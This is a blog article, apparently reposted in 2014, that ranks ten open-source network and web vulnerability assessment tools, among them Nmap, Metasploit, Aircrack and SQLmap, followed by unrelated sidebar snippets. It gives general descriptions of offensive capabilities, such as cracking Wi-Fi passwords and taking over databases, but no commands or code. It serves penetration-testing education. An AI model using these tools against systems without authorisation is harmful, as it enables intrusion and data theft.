Top 10 Security Assessment Tools

发布于 2014/08/13 11:01
字数 1820
阅读 52
收藏 0

Vulnerabilities are unfortunately an integral part of every software and hardware system. A bug in the operating system, a loophole in a commercial product, or the  misconfiguration of critical infrastructure components makes systems susceptible to attacks. Malicious techies can penetrate systems via these vulnerabilities, for personal or commercial gains. While technically this is not very easy, there have been enough successful attempts to cause one to worry.

Earlier, it was believed that this was true only for commercial products. Yet, lately, open source systems have been cracked, resulting in data theft and a loss of reputation or money. Apart from local area networks, websites are also vulnerable and have become the prime target of crackers. In short, vulnerabilities can be exploited from within the organisation, as well as over the Internet by unknown people.

On the bright side, with the number of attacks increasing, there are now a slew of tools to detect and stop malware and cracking attempts. The open source world has many such utilities (and distros). Here, I must mention BackTrack Linux, which has gained international fame for its wide range of vulnerability assessment and digital forensics software utilities. The most recent version also contains powerful wireless vulnerability testing tools.

Though there are literally hundreds of tools, I have selected the top 10 based on the fact that no other tool can really replace them. The primary selection criteria have been the feature set, how widespread the product is within the security community, and simplicity.

Please refer to Figure 1, which shows the top five tools I chose for network assessment, while Figure 2 shows the leading Web vulnerability scanning products. Of course, only FOSS tools are mentioned. I have presented the tools in the order that they are expected to be used to detect vulnerabilities; this should provide a systematic approach to readers who wish to make a career as certified penetration testers.

Top 5 network security scanners

Figure 1: Top 5 network security scanners

Top 5 web security scanners

Figure 2: Top 5 web security scanners

The top 5 network security assessment tools

Vulnerability scanning of a network needs to be done from both within the network as well as without (from both “sides” of the firewall). The approach I would suggest is to start from the network evaluation phase, where sniffing and primary attacks are performed. The gathered data is used in the attack phase to exploit the exposed vulnerabilities.


The very first step in vulnerability assessment is to have a clear picture of what is happening on the network. Wireshark (previously named Ethereal) works in promiscuous mode to capture all traffic of a TCP broadcast domain.

Customised filters can be set to intercept specific traffic; for example, to capture communication between two IP addresses, or capture UDP-based DNS queries on the network. Traffic data can be dumped into a capture file, which can be reviewed later. Additional filters can also be set during the review.

Typically, the tester is looking for stray IP addresses, spoofed packets, unnecessary packet drops, and suspicious packet generation from a single IP address. Wireshark gives a broad and clear picture of what is happening on the network.

However, it does not have its own intelligence, and should be used as a data provider. Due to its great GUI, any person with even some basic knowledge can use it.


This is probably the only tool to remain popular for almost a decade. This scanner is capable of crafting packets and performing scans to a granular TCP level, such as SYN scan, ACK scan, etc. It has built-in signature-checking algorithms to guess the OS and version, based on network responses such as a TCP handshake.

Nmap is effective enough to detect remote devices, and in most cases correctly identifies firewalls, routers, and their make and model. Network administrators can use Nmap to check which ports are open, and also if those ports can be exploited further in simulated attacks. The output is plain text and verbose; hence, this tool can be scripted to automate routine tasks and to grab evidence for an audit report.

You can read  the series of Nmap articles published earlier for better understanding.


Once sniffing and scanning is done using the above tools, it’s time to go to the OS and application level. Metasploit is a fantastic, powerful open source framework that performs rigorous scans against a set of IP addresses.

Unlike many other frameworks, it can also be used for anti-forensics. Expert programmers can write a piece of code exploiting a particular vulnerability, and test it with Metasploit to see if it gets detected. This process can be reversed technically — when a virus attacks using some unknown vulnerability, Metasploit can be used to test the patch for it.

While this is a commercial tool, I have mentioned it here because the community edition is free, yet makes no compromises on the feature set.


The Nessus scanner is a famous commercial utility, from which OpenVAS branched out a few years back to remain open source. Though Metasploit and OpenVAS are very similar, there is still a distinct difference.

OpenVAS is split into two major components — a scanner and a manager. A scanner may reside on the target to be scanned and feed vulnerability findings to the manager. The manager collects inputs from multiple scanners and applies its own intelligence to create a report.

In the security world, OpenVAS is believed to be very stable and reliable for detecting the latest security loopholes, and for providing reports and inputs to fix them. A built-in Greenbone security assistant provides a GUI dashboard to list all vulnerabilities and the impacted machines on the network.

Creating detailed reports is one thing that makes OpenVAS a tool favoured by infrastructure security managers.


The list of network scanners would be incomplete without wireless security scanners. Today’s infrastructure contains wireless devices in the data centre as well as in corporate premises to facilitate mobile users. While having WPA-2 security is believed to be adequate for 802.11 WLAN standards, misconfiguration and the use of over-simple passwords leaves such networks open to attacks.

Aircrack is a suite of software utilities that acts as a sniffer, packet crafter and packet decoder. A targeted wireless network is subjected to packet traffic to capture vital details about the underlying encryption. A decryptor is then used to brute-force the captured file, and find out passwords. Aircrack is capable of working on most Linux distros, but the one in BackTrack Linux is highly preferred.

The top five Web security assessment tools

Scanning websites is an entirely different ballgame from network scans. In the case of websites, the scope of the scan ranges from Layer 2 to 7, considering the intrusiveness of the latest vulnerabilities. The correct approach for scanning websites starts from Web-level access, right up to scanning all backend components such as databases. While most Web security scanners are automated, there could be a need for manual scripting, based on the situation.


Let’s start with this tool because of its feature set. This open source tool is widely used to scan websites, mainly because it supports HTTP and HTTPS, and also provides findings in an interactive fashion. Nikto can crawl a website just the way a human would, and that too in the least amount of time. It uses a technique called mutation, whereby it creates combinations of various HTTP tests together to form an attack, based on the Web server configuration and the hosted code.

Thus, it finds critical loopholes such as file upload misconfiguration, improper cookie handling, cross-scripting errors, etc. Nikto dumps all findings in a verbose mode, which helps in knowing more about the Web vulnerabilities, in detail. However, it can also result in too many things getting notified, some of which may be false alarms. Hence, care should be taken while interpreting Nikto logs.

Samurai framework

Once a baseline check is performed by Nikto, the next step is to take the “deep-dive” approach.Samurai is a framework — a bunch of powerful utilities, each one targeted for a specific set of vulnerabilities.

It comes as a Linux distribution, purely focusing on penetration-testing tools such as WebScarab for HTTP mapping, W3AF plugins for application-based attacks, and it also has tools to test browser-based exploits. It is amazing to note that the most recent version can find vulnerabilities that are usually not detected even by a few commercial software products.

Safe3 scanner

While the first two tools are good for static websites, for portals needing user ID and password, we need something that can deal with HTTP sessions and cookies. Safe3 scanner is a fantastic open source project, which has gained momentum and fame because it can handle almost all types of authentication, including NTLM.

It contains a Web crawler (a spider like that of search engines) capable of ignoring duplicate page scans and yet detect client-side JavaScript vulnerabilities. Safe3 scans also detect the possibility of the latest AJAX-based attacks and even report vulnerable script libraries. It comes with a user-friendly GUI and is capable of creating nice management reports.


Though very similar to Samurai, Websecurify also brings application-level assessment into play. In case of a large Web farm where code is maintained by a team of developers, following standards can sometimes yield insecure code like passwords mentioned in code, physical file paths in libraries, etc. Websecurify can traverse code and find such loopholes swiftly.

A nice feature is that it allows you to create screenshots of the problem areas automatically, which helps in preparing audit reports. It is one of the very few platform-independent tools and also supports mobile coding, which is helping it get more popular in the cyber-security assessment world.


Unless I mention a tool to detect SQL-injection attacks, this article would not be complete. Though this is a very old “first-generation” type of attack, many public websites still fail to fix it. SQLmap is capable of not just exploiting SQL-injection faults, but can also take over the database server. Since it focuses on a specific task, it works at great speed to fingerprint databases, find out the underlying file system and OS, and eventually fetch data from the server. It supports almost all well-known database engines, and can also perform password-guessing attacks. This tool can be combined with the other four tools mentioned above to scan a website aggressively.

A vulnerability assessment tool should include network scanning as well as website vulnerability exploitation. Open source software is prone to attacks too; hence, network administrators must know about the reputed scanners and use them in their daily tasks to make their infrastructure secure and stable.


粉丝 4
博文 44
码字总数 14152
作品 0
私信 提问
2018 Security Predictions (Part 8)

Given how fast technology is changing, we thought it would be interesting to ask IT executives to share their thoughts on the biggest surprises in 2017 and their predictions for......

Tom Smith

VSAQ (Vendor Security AssessmentQuestionnaire,供应商安全评估调查问卷)是一种能够自适应式评估多种供应商安全和隐私防护策略的评估调查问卷。 其中VSAQ虽然说不上是一款安全工具,更像是...


2016-12-07 10:15:43.272 [localhost-startStop-1] INFO o.s.web.context.ContextLoader - Root WebApplicationContext: initialization started 2016-12-07 10:15:43.374 [localhost-startS......




10大渗透测试系统DVWA-Dam Valerable Web Application 1、Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for ......





Rust:最小化窗口后 CPU占用率高 (winit,glutin,imgui-rust)

最近试着用 imgui-rust 绘制界面,发现窗口最小化后CPU占用会增大。 查询的资料如下: https://github.com/rust-windowing/winit/issues/783 https://github.com/ocornut/imgui/issues/1151 ...


九、zuul路由网关 概述 1.1 能干嘛 路由、过滤 路由基本配置 路由访问映射规则 十、springCloud config分布式配置中心

Circuit Breaker模式

Circuit Breaker模式会处理一些需要一定时间来重连远程服务和远端资源的错误。该模式可以提高一个应用的稳定性和弹性。 问题 在类似于云的分布式环境中,当一个应用需要执行一些访问远程资源...


原文链接:https://www.lwfdy.com/archives/144.html 之前跟大家谈了许多有关于初稿修改以及写作事项需要注意的问题,那么今天我们来说一说,在写之前,我们需要做哪些准备呢,为了做到下笔如...


Alt + Enter 引入类 Ctrl + O 查看我们继承的类或者接口中的方法,以及我们要实现的方法 Ctrl + Alt + b 查看接口实现类中方法(就是我们使用接口编程时,在调用实现类方法处直接Ctrl+鼠标左...